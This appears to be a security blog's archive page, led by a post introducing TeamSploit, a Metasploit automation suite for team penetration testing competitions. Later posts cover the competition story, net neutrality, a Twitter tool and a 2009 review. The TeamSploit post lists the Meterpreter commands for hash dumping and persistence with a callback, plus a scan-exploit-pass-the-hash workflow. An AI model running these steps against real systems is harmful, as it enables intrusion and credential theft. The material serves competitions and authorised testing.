Sunday, August 26, 2012

Maryland Cyber Challenge and Conference & Global CyberLympics: TeamSploit

This post is part of a five part series:  The Journey (Part 1), TeamSploit (Part 2), Trollware (Part 3), Unsploitable (Part 4), Defensive Tools For The Blind (Part 5).

Description:

TeamSploit makes group-based penetration testing fun and easy, providing real-time collaboration and automation. TeamSploit is a suite of tools for the Metasploit Framework. TeamSploit should work with any MSF product (including Open Source, Express, or Pro).

Features Include:

  • Exploitation Automation
  • Automated Post-Exploitation
  • Information and Data Gathering
  • Session Sharing
  • Trojans and Trollware

TeamSploit's primary goal is to automate common penetration testing tasks, and provide access and information to fellow team members.

The Origin:

TeamSploit's origin actually begins before the Global CyberLympics (GCL), and before Team ICF took first place at the Maryland Cyber Challenge and Conference (MDC3). The basis of TeamSploit grew out of our preparation for the Penetration Testing round of the MDC3. At that point in time it wasn't even called TeamSploit, nor was it nearly as feature-filled, but the foundation was laid.

It is common knowledge that a penetration test entails a lot more than simply exploiting systems. When someone hires a team to perform a penetration test, they are not hiring a group to wreak havoc on their infrastructure; they are buying a report. In fact, a great deal of a penetration tester's time is spent preparing, drafting, and organizing the final report that will be delivered to the client. While we didn't know the specifics of the final round of the MDC3 at the time, we did know it would include report writing or some simulation of that aspect.

Enter Auto Post - a Metasploit Meterpreter plugin I created to assist in the reporting aspect of a penetration test. It was essentially a collection of post-exploitation processes and tasks one would otherwise complete manually. It tied together other Meterpreter scripts and plugins and plenty of Windows commands, all with the goal of collecting a large amount of information about a system directly after exploitation. Many believe that post-exploitation is the hardest stage of an attack, and I aimed to make that sentiment obsolete. Auto Post would capture password hashes, obtain lists of running services, provide a comprehensive list of installed software, report who was logged on to the system, gather network infrastructure information, and much more. Auto Post also automated the process of maintaining access, another key step of an attack, ensuring we wouldn't lose access to our targets. In all, when running this primitive, early version of TeamSploit, you found yourself with an exhaustive log file and persistent access for each target you successfully compromised - all in an automated fashion.
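
For a sense of what that automation replaced, here is an illustrative sketch of the manual Meterpreter steps Auto Post rolled into a single pass (these are the standard Metasploit commands and post modules of the era, not the actual Auto Post script; the persistence callback address is a placeholder):

sysinfo                                          # basic host information
getuid                                           # current user context
hashdump                                         # capture local password hashes
run post/windows/gather/enum_services            # running services
run post/windows/gather/enum_applications        # installed software
run post/windows/gather/enum_logged_on_users     # who is logged on
ipconfig                                         # network configuration
route                                            # routing/infrastructure information
run persistence -X -i 60 -p 4444 -r 192.168.1.50 # maintain access (placeholder handler IP)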

Ultimately, we did utilize Auto Post in our journey to victory at the penetration testing finale of the MDC3. After gaining access to all of the systems, we delved into the Auto Post logs and started generating the requested reports for the competition. In the end, we won and were rushing away to Miami, where we honestly didn't have much use for Auto Post, but we did have use for persistent access to the systems. So TeamSploit was officially born. At this point it was little more than a configurable, template-driven version of Auto Post, but it was well on its way to becoming what it is today. TeamSploit was slowly evolving from a simple Meterpreter script into a collection of scripts, plugins, tools, and, most importantly, even more automation. For our North American Championship, we used TeamSploit to pass sessions to each other and manage our persistent access. However, our journey didn't end in Miami, and we needed to prepare for the World Finals.

As discussed in the previous post of this series, we knew the long wait between the regional Championships and the World Finals would breed a large amount of development, tools, and automation from our various competitors. It was during this window of time that TeamSploit grew into the product it is today. Feature after feature was conjured, developed, and implemented. The team practices became a breeding ground for novel ideas and tactics, and my development time became an effort to implement these new tactics and automate them as much as possible. If it could be automated, our plan was to have it automated. And let's be honest: it is possible to automate almost everything we do, so automated it would become.

Yet the World Finals of the GCL were not the end of the TeamSploit story; in fact, they were just the beginning. Today TeamSploit is still under active development. More automation is added on a constant basis, and the team and I still come up with new ideas that are added regularly.

Setup:

Downloading and installing TeamSploit is simple, as the project is hosted in Subversion on SourceForge. To check out the latest copy of TeamSploit, simply run the following command in a terminal:
svn checkout svn://svn.code.sf.net/p/teamsploit/code/trunk teamsploit
The next step is to properly configure TeamSploit for your given team and environment. You'll find the configuration file, teamsploit.conf, in your newly created teamsploit directory. TeamSploit comes with a large, comprehensive configuration file; I'm not going to go over the entire file, but I'll hit the important points.

First things first, make sure you change the first configuration option:

#  Change this to a '1' (no quotes) when you finish editing this file... 
TS_CONFIG=1

This ensures that you actually configure TeamSploit before attempting to run it the first time, saving you a great deal of headaches down the road.

Now you'll need to specify the interface you are using:

TS_MY_INT=eth0
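
If you aren't sure of the interface name, listing the attack box's addresses will show it (assuming a Linux host with the iproute2 tools available):

ip -4 addr show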

Next you are going to want to configure the team database to which you are connecting. Obviously, someone needs to be running a database. The team member who plans to host the server simply needs to set up a PostgreSQL database and share the following information with you:

TS_DB_NAME=teamsploitdb 
TS_DB_HOST=192.168.1.100 
TS_DB_PORT=5432 
TS_DB_USER=teamsploit 
TS_DB_PASS=password
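
For whoever hosts the database, a minimal setup might look like the following (a sketch using the sample role, database name, and password above; you'll also need to permit remote connections from your teammates in postgresql.conf and pg_hba.conf):

sudo -u postgres createuser -P teamsploit             # prompts for the shared password
sudo -u postgres createdb -O teamsploit teamsploitdb  # database owned by the teamsploit role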
If a fellow teammate is running the MSFD service, you'll want to specify connection information for that as well:
TS_MSFD_CONNECT=1 
TS_MSFD_HOST=192.168.1.100 
TS_MSFD_PORT=51337
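
On the sharing teammate's side, the daemon would be started with something along these lines (a sketch; confirm the exact flags with msfd -h for your Metasploit version):

msfd -a 192.168.1.100 -p 51337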
The final items you'll want to properly configure happen to be some of the most important - the teammates and ports you'll be sharing sessions with:

TS_TEAM_MATES="192.168.1.101;192.168.1.102;192.168.1.103;192.168.1.104" 
TS_TEAM_PORT=1025 
TS_TEAM_PORT_2=7000 
TS_TEAM_PORT_HTTP=80 
TS_TEAM_PORT_HTTPS=443 
TS_TEAM_PORT_DNS=53
At this point, TeamSploit should be configured and ready for you to start using.

Usage:

Loading TeamSploit is as simple as running the TeamSploit executable in your teamsploit directory:
./teamsploit
Unless otherwise configured, TeamSploit will now load two windows (three if you are connecting to an MSFD service):

TeamSploit Screenshot

Within your Primary shell, you can exploit systems and Auto Post Exploitation will run automatically, passing sessions to your Listener as well as to each of your teammates.

Within the Listener, you can interact with any sessions you've received, both from your own exploitation and from sessions your fellow teammates have acquired.
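
For example, the standard Metasploit session commands work as expected inside the Listener (the session ID below is hypothetical):

sessions -l      # list every session you hold, including ones shared by teammates
sessions -i 3    # interact with session 3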

TeamSploit also loads a number of very useful modules and plugins for you automatically.

At this point, you can compromise a target network with very little effort. The very first thing you'll need to do is configure a Nessus policy that only checks for vulnerabilities with a corresponding Metasploit module. You can follow the directions provided by Dark Operator if you'd like (Directions).

Connect TeamSploit to Nessus (be sure to replace the relevant details):
nessus_connect username:password@nessus_host:port ok
 Find your newly created Metasploit-Only Nessus Policy:
nessus_policy_list
Start a scan against your targets (be sure to replace the relevant details):
nessus_scan_new PolicyID "Scan Name" AddressRange 
You can monitor your scan with the following:
nessus_scan_status 
Once the scan is done, you'll need to import your results to TeamSploit (the Scan ID should have been returned when starting the scan):
nessus_report_get ScanID 
Now we are ready to exploit the systems:
vuln_exploit 
As each system is exploited, the Auto Post Exploitation will complete - sharing sessions with your listener and your team mates.  If during this time period you'd like to interact with your newly compromised systems, you can do so inside of your listener.

Now that all of the systems (with vulnerabilities returned by Nessus) have been compromised, it is time to pass the hash and see if we can take over any more of our targets:
pass_the_hash 
At this point, all of the collected credentials will be used against all of the remaining targets. With any luck, this will gain you further access (especially with password reuse and Windows domains).
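
Put end to end, a typical run in the Primary shell looks something like this (the credentials, host, policy ID, scan ID, and target range are placeholders for your own environment):

nessus_connect teamuser:secretpass@192.168.1.100:8834 ok
nessus_policy_list                   # note the ID of the Metasploit-only policy
nessus_scan_new 2 "Target Network" 10.10.10.0/24
nessus_scan_status                   # repeat until the scan completes
nessus_report_get 6                  # import results using the returned Scan ID
vuln_exploit                         # exploit everything Nessus found
pass_the_hash                        # replay captured credentials against the rest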

And that's it. With only a few commands and a couple of minutes, we've successfully infiltrated a target network, obtained persistent access, gathered a large amount of system information, and can now laugh at the System Administrators as they fight with the Trollware.


Video:

This demonstration shows the usage of TeamSploit from both the attacker's (left window) and the victim's (right window) perspective.

The attacker on the left has a base installation of TeamSploit on BackTrack R3 and is targeting the administrator on the right. The premise of this scenario is that the admin on the right-hand side is completing typical daily administrative work and does not know an attacker is targeting their system.

Note: This video is based on Revision 4 of TeamSploit



Thursday, August 9, 2012

Maryland Cyber Challenge and Conference & Global CyberLympics: The Journey

With the next season of the Maryland Cyber Challenge and Conference and the Global CyberLympics starting up, I am well overdue to write some posts about last season's adventure.  This will be a five part series:  The Journey (Part 1), TeamSploit (Part 2), Trollware (Part 3), Unsploitable (Part 4), Defensive Tools For The Blind (Part 5).

Maryland Cyber Challenge and Conference (MDC3)


It all started with the MDC3. Maryland decided it wanted to cash in on the vast skill and experience housed in the Baltimore-Washington DC metropolitan area, self-proclaimed to be the Silicon Valley of information security. Working for one of the larger information security firms in the area, my employer and I were directly in Maryland's cross-hairs - we were the target audience.

For the first time ever, my employer came to me to compete in a competition, instead of the other way around - a nice change of pace. I was asked to participate as the team captain and build a team due to my previous competition experience, having competed in every single Mid-Atlantic Collegiate Cyber Defense Competition: the first three years on the blue cell (defense) and on the red cell (offense) since.

The team quickly came together; honestly, I had some good candidates in mind already. Benjamin Heise was the first to get the offer, and was set up as the co-captain for the team. I had worked with Ben for a few years; he was good, one of the best I know, and he had some experience with the CCDC already. With Ben and I having extensive offensive experience, we needed some defensive folks, so I contacted Matthew Wines and Mark Reinsfelder. Both were good friends of mine, and both worked with me, plus they had competed on both the defensive and offensive teams at the CCDC. With the four of us, we already had a real powerhouse, stocked with plenty of previous competition experience. But we needed two more players. Enter Steve Collmann and Jesse Hudlow; both were new to the competition scene, but both really knew their stuff in their respective areas: Steve Collmann would primarily focus on Windows defense, and Jesse Hudlow would round out our offense. And so the team was born.

The MDC3 was a phased-based competition, each phase focused on a different arena of Information Security.  In total, we competed in three phases, the first two virtual and the last, in-person at the Conference.  Each virtual phase acted as a qualifier or elimination round, slowly dwindling the list of teams down until eight fought head-to-head at the in-person event.

The Phases:
  1. Computer Network Defense (CND)
  2. Forensics
  3. Penetration Test
The CND phase consisted of two virtual machine images, one Windows and one Linux. Both were a bit dated: Windows 2000 and Red Hat 9. We had six hours to secure the systems before they would be audited. Having a good mixture of Windows and Linux experience on the team paid off; we split up and tackled both systems simultaneously. We even used our vast offensive experience to do our own auditing and testing. In the end, while the points were not revealed, we know we made it to the next round.

The Forensics round consisted of a single EnCase hard-drive image. We were to take this image, perform the forensic analysis, and then deliver a detailed forensics report (Who, What, Where, When, Why, and How) within six hours. Using a number of open source tools, we quickly found a number of items of interest: encrypted and encoded data we deciphered, steganography we uncovered, deleted files we recovered, and plenty of logs. The remainder of our time was spent drafting the detailed report. It just goes to show that writing is a required skill in the information security field. The point totals for the forensics round were not released, but after the round we learned we had indeed passed all of the qualifiers and would be competing in the final in-person event.

The Penetration Testing round was far different from the previous two rounds, primarily because it was in-person and live. We arrived at the Baltimore Convention Center to find a large competition area, furnished with equipment and plenty of camera crews. We competed that day under the bright studio lamps, with hundreds of spectators passing through as they rushed to their next conference talk. This event required us to obtain access to eleven different systems, plant a flag, and then write a detailed penetration testing report. We were the first group to obtain access to all eleven systems; in fact, we were the first group ever to gain access to all eleven systems in the history of that environment. The scores were broadcast live to the spectators, and we actually spent a great deal of time in second place. During the last hour the scores were taken down, and we just kept on keeping on.

We impatiently awaited the results at the award ceremony, which took place at the conclusion of the conference. We were confident, but certainly not sure of the outcome. Our Project Manager, who spectated for the day, looked as if he was going to faint at any moment. As is tradition, they announced the teams in descending order, starting at third. When they announced that 'Team Pr3tty' had secured second place, we knew we had taken home the gold. Barely containing our excitement, we awaited our name to be called and our chance to walk on stage.

We joined the stage, shook hands, took pictures, and if you've seen any TV game shows you know how this next part goes - as we walked across the stage, the announcer said, "And you're GOING TO MIAMI." Dazed and confused is the only way to describe it. We looked down at our Project Manager as the announcer continued to explain that the first and second place teams got a seat at the North American Championship for the Global CyberLympics - tomorrow.

After much fanfare and endless phone calls, we got all of the approvals in order and headed home, for less than twenty-four hours later we would be on a plane headed to the GCL...

Global CyberLympics (GCL)


We skipped right past the qualifications and eliminations, directly to the big show, the North American Championship.

Unlike the MDC3, the GCL was a more traditional CTF event.  Each team had a number of systems they needed to defend against all the other teams.  Flags were replaced with "phoning home," a process which informs the scoring system you have access, and at which level.

We broke the team down into two groups: Offense and Defense. We had two primary players for each group, and two floaters; the team broke down as such:

  • Offensive Floater:  Me
  • Offensive Group:  Ben & Jesse
  • Defensive Floater:  Matt
  • Defensive Group:  Mark & Steve
The structure was simple: the dedicated defensive players would focus on defending our network, and the dedicated offensive players would focus on attacking everyone else. The floaters would stick to their primary designation unless the other group needed assistance.

Right out of the gate, the offensive group gained and maintained access to just about every Windows box, and had most of the Linux boxes too. This situation didn't really change much throughout the entire event. We rarely lost access, and just slowly picked up the few stragglers here and there. The defensive players played cat and mouse with the attackers all day. It was a cakewalk on the offensive side, but an all-out grudge match on the defensive side. The scoreboard was live until sometime late in the afternoon, although we were in first almost the entire time.

In the end we secured the title of North American Champions with almost seven times the offensive score of the second place team, but only a round's worth of points on the defensive side.  We won, no doubt, but the event was a real eye-opener into where our team needed the most work:  Defense.  After much celebration in Miami, we headed home, home to work, home to life, but also home to prepare...prepare for the World Finals.

The MDC3 and the North American leg of the CyberLympics took place in October; however, the World Finals weren't held for another five months, in March of 2012. We had plenty of time to plan and prepare. Ben immediately started work on a lab environment, filled with countless vulnerable images, and I quickly put together a scoring engine. Between the two of us, we created our own CTF in a box. After which, the CTF team got together time and time again and ran full-on, pedal-to-the-metal events. The offensive side would pummel the defensive side, and the defensive team would cry out in anger. But slowly the defensive team was getting better and better. I even devised a small training program, consisting of a crawl, walk, run approach to under-fire Windows defense. All in all, our defensive side was really shaping up, and our offensive team was getting an itch - an itch to automate.

Knowing there were months before the World Finals, we knew people would code, script, and automate as much as possible. The environment was going to be the same; everyone had already seen it. In a lot of respects, the competition came down to an ingenuity and coding contest. As our defensive group got better, we started transitioning our focus to tool development. If it could be automated, we were automating.

We worked on both offensive and defensive tools.  On the defensive side, we planned to have automated patchers, system monitoring, active response tools, and much more.  On the offensive side, we planned out automated exploitation, automated post exploitation, even tools to automate the flag steps (phoning home) and plenty of other treats.  In the end we really only came out with three viable products:  TeamSploit, Unsploitable, and Defensive Tools For The Blind.  I'll go into depth on each of these in the upcoming parts of the series, for now here is a quick description:

TeamSploit: TeamSploit makes group-based penetration testing fun and easy, providing real-time collaboration and automation. TeamSploit is a suite of tools for the Metasploit Framework. TeamSploit should work with any MSF product (including Open Source, Express, or Pro).

Unsploitable: Unsploitable is an emergency patcher, providing critical security patches and updates for commonly exploited vulnerabilities in common operating systems, services, and applications.

Defensive Tools For The Blind: Defensive Tools For The Blind (DTFTB) is a collection of Windows and Linux tools that automate discovery of post exploitation, backdoors, and rogue access, for defenders. DTFTB allows a system defender to quickly and precisely locate common backdoor tendencies and system misconfigurations used by an attacker to maintain access.

In the end, we placed second in the world, behind none other than Deloitte (one of the Big Four). Trust me, you can't complain. It was a wild journey, filled with fun and learning - what more could you ask for?

Here are some articles about our journey and accomplishments:

Keep an eye out for the upcoming parts of this series:  TeamSploit (Part 2), Trollware (Part 3), Unsploitable (Part 4), Defensive Tools For The Blind (Part 5).

Monday, October 26, 2009

Regulations of Open Networks...say what?

I am all for open networks, applications, projects, etc. I even strongly support FOSS. In fact, every piece of code I personally write for public consumption is released under the GPLv2. (I'll look into v3 when it stabilizes a bit more; some of it is still too new for me to make an accurate risk evaluation.) I have, of course, written stuff for myself (and that code holds a strong IP copyright)...but if I were to release it, it would be open source. Yet, even from a business standpoint, I would argue that FOSS is the way to go. You become the free, de facto standard...and fsck people for support. And then when you eventually fork a professional version that is more stable, has more updates, is more feature-rich, and is more enterprise-geared, those changes get backported to the FOSS version as time progresses and the pro version is further updated. (Examples: Nessus, Snort, Wine, Red Hat, etc.)

Now...with all of that said, we live (last I checked) in a capitalist economic society. If you want to write software, platforms, firmware, etc. and charge for it, then so be it. If you want to keep other people from manipulating it, then so be it. More than likely, I will never personally use it or even support you -- but good luck to you anyway. With some smart marketing professionals (who then write "1x faster than the competition" on the package), you'll succeed either way.

Furthermore, I strongly disagree with patents on software. Great...you've come up with an idea! Have a cookie and go make it happen! Do it right, and you win! Software patents protect people and companies who suck at turning an idea into a solution. Just because you had an idea doesn't mean that I shouldn't be able to implement it in my own way, for my own purposes, on my own terms.

Specifically concerning "Net Neutrality," there are currently two schools of thought. The first feels that companies should be allowed to do as they choose. That is, they can block sites, customers, countries, applications, protocols, etc. The feeling is that "they" run the network, so "they" make the call. Conversely, the other line of thinking is that it should be open and that companies shouldn't be allowed to tell a customer how he/she can and should access some form of technology.

Personally, I have never been one to support the government telling a company how to run a business. I believe that if the company is doing it wrong, they'll figure that out at bankruptcy court. At the same time, I don't think the companies have the right to tell you what to do in your own home. Thus, I am torn, really.

One thing I do know, though, is this: the side that is trying to keep things open is going about it ALL wrong. Net Neutrality doesn't just cover corporations...it covers government bodies as well. Everywhere I turn, someone else is pleading with the FCC to create laws to keep the Internet, networks, and technology from being infringed upon by both the government and the corporations.

HELLO?!? Did I miss something? How do you enact a law prohibiting the enactment of other laws? Do people not see that once the FCC gets involved (that is, once they get jurisdiction over this forum), it will set a precedent, and the very thing everyone wants them to protect WILL BE TAINTED?

Really.

Do I want my internet provider to tell me what I can and cannot do on the Internet?  No.

Do I want my government to tell me what I can and cannot do on the internet?  No.

Do I think the government should be protecting us from such infringement?  No!

Let's make it simple: if there is a telco out there blocking access, drop them and get another one. Trust me, if they all close up, someone will step forward. OpenISP, anyone? Seriously though, we CAN vote with our wallets...and we should! Some usage is already protected by law; there are fair use laws in place, laws protecting speech, etc. Those should cover the majority of the issues. The rest can be handled with our money.

Just think twice before you ask for more laws and regulations to protect us; they may be the very thing that hampers us...

Monday, October 19, 2009

twitter2rss: Turn Friends into Feeds


A New Twitter Tool:

This past weekend I worked on a new project idea I had stored in the back of my mind. The project, "twitter2rss," allows you to generate an OPML RSS feed list of all of the friends of a particular Twitter account. In other words, you give it the username of a Twitter user, and it gives you a list you can import into your feed reader. The project is nothing elaborate; it is not supposed to be. It is just a simple tool that allows you to create a feed list.

If you have any questions, comments, suggestions, or (hopefully not) complaints, leave them in the comments.

Why:

There are a few known use cases (based on my own uses, and that of a few friends).

  • Your RSS feed reader does not allow authenticated feeds (the quickest way to get the "home" feed - Google Reader is an example)
  • Twitter is blocked at your location, but you still wish to obtain the feed data through a web-based reader
  • You are not a Twitter member, but wish to follow someone else's friends (lurkers)
I am sure there are other cases where this tool may be useful; leave your own uses in the comments if you'd like.


Project Description:

twitter2rss will obtain all friends of a specified Twitter account and then create an OPML feed list. The feed list will contain all of the obtained friends' Twitter RSS feeds, which can then be imported into any standard feed reader.

Project Links:

Project Page:  http://twitter2rss.sf.net (Just the default Source Forge Project Page)
Summary Page:  http://sourceforge.net/projects/twitter2rss/ (This is more than likely the one you want)
Downloads:  http://sourceforge.net/projects/twitter2rss/files/

Project SVN:

svn co https://twitter2rss.svn.sourceforge.net/svnroot/twitter2rss twitter2rss - Check out:  http://sourceforge.net/projects/twitter2rss/develop

Enjoy,
Justin

Saturday, October 17, 2009

As The Calendar Turns: A Brief Review of the 2009 Fiscal Year on the Information Highway

Wow...

Has it truly been over a year since my last blog post? I know I am certainly not the most frequent (or even semi-frequent) blogger on the Internet, but could it really have been that long ago that I posted about Twitter changes and talked about the amazing mobility I have with my BlackBerry? I guess it has indeed been a year or so since those posts were made. Perhaps we should change all of that...start this fiscal year fresh with a post. Of course, when you have been quiet for a year (even though I've been active and vocal in plenty of other Internet outlets), where do you really start? How about a blog post about what has changed in the past year?

You don't often get to read a post about the dramatic changes of the past year - mainly because people keep you current with frequent content, and partially because people are too busy to stop and count the bits. But when you do pause for a moment and look back, it seems like just yesterday that CNN and Ashton Kutcher were fighting for the title of first user to have one million Twitter followers and Oprah was joining Twitter (with thousands of soccer moms following). What about all the great malware of this past fiscal year? Are you still cleaning Conficker off your systems? It feels like just yesterday we were coming out of one of the most high-tech elections of all time. Time surely flies, so let's take a look at the highlights.

Twitter

I feel like Twitter receives too much coverage; yet, it may actually be the most promising and popular communication tool. It really wouldn't be accurate to exclude the accomplishments of Twitter in such a post. Going "mainstream" is the dream of most Internet start-ups. Not many complete such a task, and certainly most do not have major news network coverage. However, Twitter found such success late last year - with many news-breaking events. It seemed that every time the news networks dropped the ball with a story, Twitter was right there to catch the opportunity. And the people noticed - as did the media. Spotting a prime opportunity, they jumped on the bandwagon shortly thereafter as well.

Moreover, the number of Twitter users continued to climb rapidly.  From housewives to teenage celebrities, everyone was joining Twitter.  Luckily for us avid geeks, the twittersphere is averaging itself out.  But it is still nice to acknowledge the great success that Twitter has come into...we should all take a moment and congratulate Twitter again for such a wonderful Web 2.0 story, and a wonderful product.


Now if I never read another post, comment, tweet, or article about Twitter, I'd be content.

Legal & Cyber Command


It was not too long ago that every time I changed the channel, I'd see another Air Force cyber command commercial. That all was laid to rest when a national Cyber Command was forged. This command will oversee the nation's information security infrastructure. Along with this institution's creation came a large amount of concern - both over network neutrality and national privacy. While very few questions have been answered, it is fair to remind everyone that the entire project is still very much in the developmental stage. One thing is for sure: our government is taking the security situation seriously. Let's help facilitate such actions in any way that we, as the community, can!

Don't forget about the interesting Cyber Security Act of 2009, though, which gives the President the power to "shut down" the Internet. We haven't heard much about this recently. Maybe we should review the progress?

Conficker

Every once in a while, a great deal of hype is cultivated around a security issue. More often than not, this issue is far from the most pressing. Many times, other larger issues will even coincide, time-wise, with this publicly hyped threat. Enter Conficker, the April 1st malware of the year. It seems that as of late, each new year brings a new piece of malware (vapor-malware) that makes a run with a destruction date of April 1st. Time after time, the mass media runs with such a half-cocked story. Conficker is really no different. The malware did little harm overall. Of course, the security community took the opportunity to further educate the general public.

While the infection didn't cause the end of the Internet as some would have hoped (or as others would have had you believe), it is quite interesting to note that even as recently as two weeks ago, there are still over 250 million active infections.  It begs the question: are hyped threats spread further through haphazard searches? Furthermore, are they funded increasingly by the adversaries due to their popularity?  Or are they simply more visible?  These are some questions that the community really needs to ponder - as there will be plenty more to come on April 1st...or so we all hope.

SMB2

Certainly every time you check your RSS feed, you read about another vulnerability. Given the popularity of its products, Microsoft is at the top of the offenders list. (We could discuss the reasons indefinitely and ad nauseam, so let's just skip them for now.) However, not nearly as many are as profitable as the previous RPC/SMB-related vulnerabilities. Those are gems amongst the rough - depending upon your perspective. This year brought us another such novelty: the SMB2 vulnerability.

One of the most fascinating aspects of this vulnerability lies not in the vulnerability itself, but in the timeline. The vulnerability was originally released simply as a denial of service. Some people in the industry claimed that the vulnerability was further exploitable to control execution; others strongly disagreed. Microsoft released a statement indicating it was ONLY a denial of service. The interesting story was really going on in the background, within the "underground" communities, where exploit code could be found that controlled execution - promoting this vulnerability to the remotely exploitable code execution category. To add more fear to the atmosphere, it took over nine days before a private security company released information that they had developed a proof of concept that allowed remote code execution. Only after these facts surfaced did Microsoft confirm the true risk of this vulnerability. For the pentesters out there, this is one more trick we can keep up our sleeves. For the system administrators, don't forget to patch your new installs.

Wave

It is almost unfair for me to mention this when attempting to review the past. But bear in mind, we first heard of this new Google initiative in the previous year. It seems that the party is really just starting with this one, and it may be too early to really review the progress. However, there are some eerie similarities to past Google projects. Take Gmail as an example. That project was also released as a closed-invitation beta. Hype grew...and you had people literally buying invitations. I am unsure how far the hype will spread with Google Wave, but certainly the potential is there.

People are outright begging for invitations. It seems everyone is talking about the new collaboration tool, but almost no one has an account. The original invitations reportedly numbered somewhere around 100,000. I doubt that people will openly sell or buy invitations (it is certainly against the terms of service), but that is certainly not stopping the malware authors, spammers, and other Internet delinquents from jumping on the bandwagon. I am making a prediction: I expect to see more in this arena in the near future. This will most certainly translate into a future blog post...it just depends on how deep the rabbit hole goes.

Phones, Gadgets, and Toys

Apple, RIM, and Google have really taken the world by storm (no RIM pun intended) in the mobile phone market. More electronic gadgets have been produced than we can even afford. It seems that the average consumer is becoming more and more technically savvy, and more and more technology-centric. I would be remiss if I didn't include some of the outstanding leaps and bounds that the electronics market has achieved. The mobile world continues to become more integrated with the cyber world. Only time will tell how far this path will lead. Yet no matter which devices or companies you cherish, just remember: with collaboration come great outcomes. Enter some great electronic collaborations. More and more manufacturers and technology companies are teaming together to bring us even more power and resources in a mobile world.

Collaboration

This brings me to my last point: collaboration.  Each year it seems that the technology communities unify more and more-helping to facilitate more opportunities.  Out of all of the great events and achievements of this past fiscal year, this, in my opinion, is the most profound.  More open standards are created and more collaboration is bred.  Hopefully, we can see this methodology continue to grow.

Open Ending

No fears...I purposely kept this post brief and open-ended.  I wanted to lightly highlight some of the key events in (fiscal year) 2009.  I certainly didn't cover every event...not even the major ones. But hopefully, this will remind you of some of the prominent issues and events we endured.  While the fiscal year is over, the calendar year is still ticking.  I hope to review some of these events and components again in the future and see some of the end results.  Please allow this post to remind you to take a pause every now and again, to look back and reflect on the stepping stones that have brought us to this point.  It is something that many of us take for granted.  Comments are always welcome. I hope we can spark some interesting conversation about the past events and project some lessons learned into the future.

Always,
Justin M. Wray

Friday, September 19, 2008

Twitter: Changes Afoot

Check out the new Twitter design; it's looking great. This was my number-one complaint about Twitter compared to the other micro-blogging services. It felt too MySpace-ish; all that has changed.

Twitter Blog: Changes Afoot

Monday, September 8, 2008

Mobility, Part Two

In my previous article, I spoke about mobility: having the ability to move freely and still have access to all of your data and services. More specifically, I focused on mobile devices and interfaces to our normally desktop-centric world. This time I will skim the surface of another form of mobility: the cloud.

Having the ability to go from one location or workstation to another, while still having access to your data, is an important hurdle to jump. Many businesses tackle this issue with "roaming profiles" and other shared resources. But what do you do at home, when sharing a profile between home, work, friends, and the library isn't an option? I'd suggest using an Application Service Provider.

Application Service Providers aren't a new concept, and Google is far from the first company to invest time, money, and resources into the idea.

From Wikipedia: "In terms of their common goal of enabling customers to outsource specific computer applications so they can focus on their core competencies, ASPs may be regarded as the indirect descendants of the service bureaus of the 1960s and 1970s. In turn, those bureaus were trying to fulfill the vision of computing as a utility, which was first proposed by John McCarthy in a speech at MIT in 1961."

The idea is simple: you register for a service or application that is provided online. All of your information and data is stored on the provider's servers. When you need to access the service or data, you simply visit the website and log in, no matter your location.

I personally rely on cloud-based services as much as I rely on mobile applications. I have almost all of my email in Google's Gmail (either directly or through POP support or forwarding). I use Google Calendar on a daily basis to help keep me on track and update others on my whereabouts (when needed). Google Reader is a dream come true - one of the best readers available. Even this blog is an example of a cloud-based service I use. My list could continue, just as I am sure yours could. Even social networks are a form of cloud computing.

I can easily go from my laptop at the airport to the desktop at my house and never miss an article, re-read an email, or forget about an appointment. But better yet, when I am in an unfamiliar place (the library, a public system, a friend's house), I still have access to the very same data, in the very same interface. Everything just works, no matter where you go.

The release of Google Chrome shows how important the concept is to Google. They are now developing a browser that works better with web-based applications. Mozilla has also taken a stab at this technology with WebRunner/Prism. Adobe has been working in the arena with Adobe Air.

As systems progress and we continue to see items that are mobile-centric (like netbooks, iPhones, etc.), this technology will progress. We will continue to move our storage off of our system hard drives and into data centers.

I encourage everyone to try out some ASPs, and write back with your favorites.